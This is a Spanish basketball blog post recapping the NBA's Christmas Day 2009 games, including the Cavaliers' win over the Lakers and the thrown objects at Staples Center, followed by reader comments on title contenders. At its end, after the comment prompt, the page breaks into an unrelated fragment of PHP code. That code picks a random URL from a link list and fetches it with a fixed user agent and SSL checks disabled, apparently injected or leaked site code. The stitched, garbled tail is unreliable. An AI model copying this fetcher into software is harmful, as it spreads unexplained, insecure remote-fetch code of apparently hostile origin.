La Crónica del día de Navidad (25/12/2009)

26 de December de 2009 por txusma

Y los Cavs asaltaron el Staples Center. Y lo hicieron a todos los nivels y con todas sus consecuencias provocando un hecho inédito: a 4 minutos del final, tras la expulsión de Lamar Odom, el público comenzó a lanzar al campo esas manos de espuma tan de moda en la NBA e incluso alguna que otra botella de agua (podéis ver el video un poco más abajo). Una reacción absurda y exagerada producto posiblemente de la frustación y de alguna decisión arbitral polémica. Y es que a nadie le gusta perder contra Lebron.

La cuestión es que los Cavs pusieron en práctica un juego muy físico y con ataques rápidos que superó completamente a los lugartenientes de Kobe Bryant. Shaquille O’Neal y Zydrunas Ilgauskas se comieron en la zona a Pau Gasol, que se quedó en 11 puntos y 6 rebotes, y Andrew Bynum que sólo pudo anotar 4 puntitos. Por fuera, Mo Williams jugó unos de sus mejores partidos y Lebron James, a pesar de ser perseguido hasta la saciedad por Ron Artest, se fue a los 26 puntos y 7 asistencias.

Toque de atención para los amarillos que ven como los Celtics vuelven a compartir con ellos el primer puesto en la clasificación de la liga regular. Y es que los verdes, liderados por Rajon Rondo y a pesar de la ausencia de Paul Pierce, se impusieron a los Orlando Magic a domicilio. Fue un partido muy trabado, con continuas faltas y muy defensivo, el perfecto caldo de cultivo para la victoria de un equipo como Boston. Dwight Howard se fue a casa con sólo 5 puntos en 7 míseros lanzamientos y 7 pérdidas y aunque cogió 20 rebotes, seguro que no lo hizo nada satisfecho.

En el tercer gran partido de la noche, unos increíbles Blazers plagados de bajas vencieron a los Nuggets en un último cuarto sublime. Brandon Roy, a pesar de su lesión en el hombro, se fue a los 41 puntos y lideró a un equipo que juega con Juwan Howard de pívot titular. Chauncey Billups volvió a jugar después de 3 partidos pero sólo disputó la primera parte por precaución. Su baja afecta en demasía a Denver.

En los últimos 2 partidos del día de Navidad, los Heat vencieron a unos Knicks que venían lanzados en diciembre y los Suns se impusieron con extrema facilidad a los Clippers.

PREMIOS

MVP: A pesar de tener el equipo plagado de bajas y de estar él mismo lesionado Brandon Roy lideró a su equipo a  la victoria con 41 puntos, 6 rebotes y 4 asistencias. En Los Angeles, Mo Williams fue el mejor del partido con 28 puntos, 6 rebotes y 7 asistencias cumpliendo a la perfección su papel en los Cavs.

Rookie: Jugaron poquitos rookies y ninguno estuvo destacado así que el premio queda desierto.

Sorpresa: Danillo Gallinari va dando día a día muestras de que no es sólo un gran tirador. Anoche se fue a los 26 puntos a los que añadió 8 rebotes y 3 asistencias. En los Clippers Rasual Butler ocupó el puesto de titular de Al Thorton y se marcó 22 puntos y 7 rebotes.

Decepción: Mal partido de Jameer Nelson que sólo pudo anotar 8 puntos en 11 lanzamientos. Dwight Howard tampoco puede estar muy orgulloso a pesar de sus 20 rebotes ya que sólo intento 7 lanzamientos. Es para irse cabreado a casa.

Esfuerzo en vano: 2 fueras de serie como Kobe Bryant y Carmelo Anthony se fueron a la cama tras perder sus respectivos encuentros. Y todo a pesar de los 35 puntos, 9 rebotes y 8 asistencias del primero y los 32 puntos, 7 rebotes y 4 asistencias del segundo.

VIDEO DEL DÍA

Lluvia de objetos en el Staples Center. ¿Quién lo iba a decir?

Comenta

10 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Lo veia venir. Primer rival serio para Lakers y …..zas en toda la boca! Yendo 20 abajo casi todo el partido.
    Era mal síntoma el necesitar el mejor Kobe y Gasol para doblegar en los últimos minutos a Thunder, Bulls, Bucks, Heat, Y claro, el día que Gasol estuviera nulo, y Bryant, que a pesar de que fue el único que le echó ganas, desacertado (11/32), se llevarían un tortazo cómo ha sucedido. Para mí es un delito, que teniendo gente de la talla y salario de Bynum y Odom, no tengan huevos y viendo que Pau no tiene el día, cojan responsabilidad y tiren del carro. Especialmente grave me parece lo de Lamar, volviendo a ser expulsado por mostrar esa actitud chulesca y prepotente. Será bueno, anotará, reboteará, pasará y hará de todo, pero a mí cada día que pasa me desespera más. Y sobre los bases, pfff. Fisher ya no está para jugar más de 20 minutos, demasiado ha hecho ya el hombre, y Farmar es un 2ºbase para un equipo perdedor, no entiendo qué pinta en el equipo más glamouroso e importante del basket. Kupchak debería ir pensando en un base ya. Otra cosa, ¿Qué hace Bryant jugando 45 minutos en diciembre con el dedo medio roto, y jugando los últimos 7 minutos perdiendo de 20?, veremos a ver cómo acaba ese dedo,
    El único Laker que se fue contento, sería Vujacic, cuánto tiempo haría que no metía 5 puntos (por cierto, en los últimos 30 seg con el partido decidido.)

    Total que los Cavs se movieron como Pedro por su casa, con excepcionales Williams y James, un buen trabajo de Parker, Moon y West, un desapercibido O’Neal, y un Varejao que hizo dos jugadas tipo Olajuwon (salvando las distancias).

    Sobre el Mag-Celt, horrible partido, ganó el que jugó menos peor, en este caso Celtics, sin Pierce, con un Garnett al 30% de sus posibilidades y fyera de casa, lo que dice mucho del horrible partido de Orlando, el peor de la temporada. Van Gundy sigue sin enterarse de que hay que meterles más balones a Howard.

      Citar

  2. Viva_Dirk dice:
    #2

    Con todos los partidos que he visto este año mi opinión es que los Lakers van a tener que jugar a perder para no ganar otro anillo. Me da igual si son 5+2, o son solo 2, el resto de aspirantes da pena. Boston y Orlando jugaron ayer el peor partido de la NBA de todos los tiempos.

      Citar

  3. Love Denise dice:
    #3

    Que Boston y Orlando jugarán un infame partido, no quiere decir que sean malos. No te dejes llevar por un solo partido. Yo, sinceramente, no veo a los Lakers tan bien y tan años luz como lo veis vosotros.

      Citar

  4. Kajie dice:
    #4

    Para mí será Boston quien tenga que jugar a perder para no ganar otro anillo. Tal y como están a día de hoy los dos equipos y con todos los titulares, los Celtics ganarían fácil a los Lakers a 7 partidos. Y ayer jugaron mal, pero ganaron, que es lo que cuenta al final.

      Citar

  5. Love Denise dice:
    #5

    Para mí el EQUIPO de Celtics, que no el 5 inicial, es mejor que el de Lakers, la duda está si los treintañeros Allen, Pierce, Garnett y Wallace aguantan sin lesiones hasta el final. Este año Garnett está jugando al 60% de lo que sabe hacer. También les vendría bien fichar en febrero a algún alero suplente.

      Citar

  6. Lagarto dice:
    #6

    Realmente, los Lakers de ayer me dejan serias dudas…estoy más con los comentarios de Love Denise y no entiendo la teoría de Viva_Dirk. Vamos a ver, Viva_Dirk, ¿estás diciendo que los Cleveland no son rival para LA?…pero si ayer los destrozaron desde el pitido inicial, ya que fue una agonía completa de los Lakers durante todo el partido…¿para qué quieres a Orlando y a Boston?. Otra cuestión es que pese al mal partido de Gasol y Bynum, la nula aportación de banquillo, etc. etc…tampoco el señor de los anillos parecía que tenía ninguna receta efectiva para enderezar el curso del partido. En resument, vi un equipo que no pinta bien con rivales de enjundia, veremos a ver …

      Citar

  7. Viva_Dirk dice:
    #7

    Veremos, pero el señor de los anillos nunca ha parecido que tuviese soluciones para nada y siempre han llegado. Ayer vi a un equipo como Lakers hacer un mal partido, pero cada partido que le he visto a Boston ha sido un dolor de cabeza, en Orlando cada uno esta a lo suyo y Cleveland salvo que Shaq se este reservando para los play-offs no tiene nada que hacer contra estos en una eliminatoria a 7 partidos.

    Pero vaya, el nivel general de esta temporada me esta pareciendo el mas bajo de la última década.

      Citar

  8. max dice:
    #8

    No va a suceder en cada partido que KB falle veintiun tiros a canasta y que Gasol quede anulado, pero cuando eso pase los Lakers no tienen nada que hacer. Hacen falta más recursos que el simple hecho de que Kobe se las juegue todas. No sé que os parece, pero creo que les hace falta un base-escolta con buen tiro para tener más soluciones tácticas (al estilo de Mo Williams). Por otra parte, Bynum se ha desinchado y Artest tampoco responde a las expectativas de un equipo campeón.

      Citar

  9. sergio dice:
    #9

    Yo no juzgaria a los Lakers por un partido y mas sabiendo que son tipico equipo remora… de los que se deja llevar en regular. Desde luego no creo que sean inmensamente favoritos pero si los veo muy en forma. Tiene aspectos en contra como cantidad de jugadores en la rotacion, minutos de sus estrellas, Bynum desapareciendo,…. pero tampoco creo que haya ningun equipo puntero del que no podamos sacar aspectos a mejorar.

    Los Cavaliers recordemos que empezaron el año muy mal, pero aun asi no creo que haya nadie aqui que dude que pueden ganar a cualquiera. Quizas LeBron y los suyos llegaron mas motivados que los Lakers. Desde luego no es una excusa pero aun veo a los Cavs por debajo de Boston y LA.

      Citar

  10. Kajie dice:
    #10

    Acepto pulpo como animal de compañía, pero aunque se me vea el plumero verde, para mí los Celtics tienen mejor quinteto que los Lakers. Comparemos si no: Fisher-Rondo, un 2 bastante claro, Fisher no aporta prácticamente nada en ataque y en defensa no tiene la intensidad de Rondo. Ray Allen – Bryant. Un 2, pero Allen no se queda tampoco muy lejos, también es capaz de decidir los partidos él sólo. Pierce – Artest, un 1. Pierce no es tan buen defensor como Artest, pero bueno, qué os voy a contar del resto. Gasol – Garnett, actualmente una X, Gasol está algo mejor en ataque pero es peor en defensa, y Garnett está al 60% de sus posibilidades. Y por último, Bynum – Perkins, una X. Perkins ha demostrado que puede hacer de todo; anotar, rebotear y sobre todo defender, y lo que acaba de igualar la balanza es su regularidad.

    Aquí está mi análisis, creo que bastante objetivo. Y no hablemos del banquillo, porque ya sería de traca. He visto bastantes partidos de los 4 teóricos favoritos (Lakers, Magic, Celtics, Cavs) y creo que hay bastante igualdad pero en lo malo, y es que los 4 están jugando bastante mal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>